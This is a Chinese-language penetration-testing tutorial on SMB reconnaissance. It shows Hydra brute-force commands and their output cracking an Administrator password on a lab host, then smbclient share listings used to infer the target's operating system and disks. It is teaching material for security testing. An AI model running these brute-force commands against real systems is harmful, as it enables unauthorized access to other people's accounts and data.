網絡掃描：利用SMB服務

服務器信息塊（Server Message Block，SMB）是一種IBM協議，用于在計算機間共享文件、打印機和串口等。SMB協議可以用在TCP/IP協議之上，也可以用在其他網絡協議（如NetBEUI）之上。本文介紹利用SMB服務提供的共享文件夾信息，來判斷目標主機的操作系統類型和磁盤信息等。

SMB是一種客戶機/服務器、請求/響應協議。通過SMB協議，客戶端應用程序可以在各種網絡環境下讀、寫服務器上的文件，以及對服務器程序提出服務請求。此外，通過SMB協議，應用程序可以訪問遠程服務端的文件，以及打印機、郵件槽和命名管道等資源。

1. 暴力破解SMB服務

如果要利用SMB服務來獲取信息的話，則需要知道該服務的登錄用戶名和密碼。如果使用Samba構建SMB服務的話，默認安裝后，將創建一個名為root的Samba用戶，密碼為空；如果使用Windows自帶的SMB服務的話，則需要提供對應的用戶名和密碼。下面介紹使用Hydra工具暴力破解SMB服務的方法。

Hydra是一款非常強大的開源密碼攻擊工具，支持多種協議的破解，如FTP、HTTP、SMB等。其中，用于暴力破解SMB服務的語法格式如下：

Hydra -L -P [server IP] smb

使用Hydra工具暴力破解Windows自帶的SMB服務。執行命令如下：

root@daxueba:~# hydra -L user.txt -P pass.txt 192.168.19.131 smb

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2021-08-06 10:12:41

[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)

[DATA] max 1 task per 1 server, overall 1 task, 156 login tries (l:13/p:12),~156 tries per task

[DATA] attacking smb://192.168.19.131:445/

[445][smb] host: 192.168.19.131  login: test

[445][smb] host: 192.168.19.131  login: Administrator  password: daxueba

1 of 1 target successfully completed, 2 valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2021-08-06 10:12:43

從輸出的信息中可以看到，通過使用Hydra工具找到了一個有效的用戶名和密碼，用戶名為Administrator，密碼為daxueba。一般情況下，Windows系統都會允許Administrator用戶訪問所有資源。所以可以使用-l（小寫）選項直接指定暴力破解該用戶的密碼。

root@daxueba:~# hydra -l Administrator -P pass.txt 192.168.19.131 smb

2. 判斷操作系統類型

在Linux系統中，提供了一款名為smbclient的客戶端工具，可以用來訪問SMB服務中的共享文件。當成功訪問到SMB共享文件后，即可看到共享文件名、磁盤類型及描述信息。通過對這些信息進行分析，則可以判斷出目標主機的操作系統類型及磁盤類型。smbclient工具的語法格式如下：

smbclient -L -U [username]

訪問Linux系統中的SMB服務。執行命令如下：

root@daxueba:~# smbclient -L 192.168.19.130 -U root

Enter WORKGROUP\root's password:

輸入SMB服務用戶登錄的密碼將顯示如下信息：

Sharename    Type   Comment

---------    ----     -------

print$   Disk   Printer Drivers

share    Disk   Share folder

IPC$   IPC    IPC Service (Samba 4.9.2-Debian)

Reconnecting with SMB1 for workgroup listing.

Server     Comment

---------    -------

Workgroup    Master

---------     -------

從以上輸出信息中可以看到目標SMB中共享的文件。其中，Sharename表示共享文件名、Type表示硬盤類型、Comment是共享文件的描述。從以上的Comment列可以看到共享的IPC服務版本為Samba 4.9.2-Debian。由此可以說明，該目標主機的操作系統類型為Linux。如果目標主機的操作系統是Windows的話，則文件名列將顯示共享文件夾的盤符。具體如下：

root@daxueba:~# smbclient -L 192.168.19.131 -U Test

Enter WORKGROUP\Test's password:

Sharename    Type   Comment

---------      ----    -------

ADMIN$       Disk   遠程管理

C$         Disk   默認共享

E$         Disk   默認共享

IPC$        IPC    遠程 IPC

share       Disk

Users       Disk

Reconnecting with SMB1 for workgroup listing.

Server        Comment

---------         -------

Workgroup      Master

---------         -------

從以上輸出結果的文件名中可以看到，默認共享的磁盤有C和E盤。只有在Windows系統中，文件夾才是以盤符形式來劃分磁盤的。由此可以判斷出，該目標主機的操作系統類型為Windows。

3. 判斷磁盤類型

下面同樣通過分析目標SMB服務的共享文件夾信息，來判斷共享的磁盤類型。具體如下：

root@daxueba:~# smbclient -L 192.168.19.130 -U root

Enter WORKGROUP\root's password:

Sharename    Type   Comment

---------      ----     -------

print$       Disk   Printer Drivers

share       Disk   Share folder

IPC$        IPC    IPC Service (Samba 4.9.2-Debian)

Reconnecting with SMB1 for workgroup listing.

Server        Comment

---------         -------

Workgroup      Master

---------         -------

從以上輸出的信息中可以看到，Type列有兩種值，分別是Disk和IPC。其中，Disk表示硬盤；IPC表示命名管道。由此可以說明，share共享文件是硬盤中的一個文件。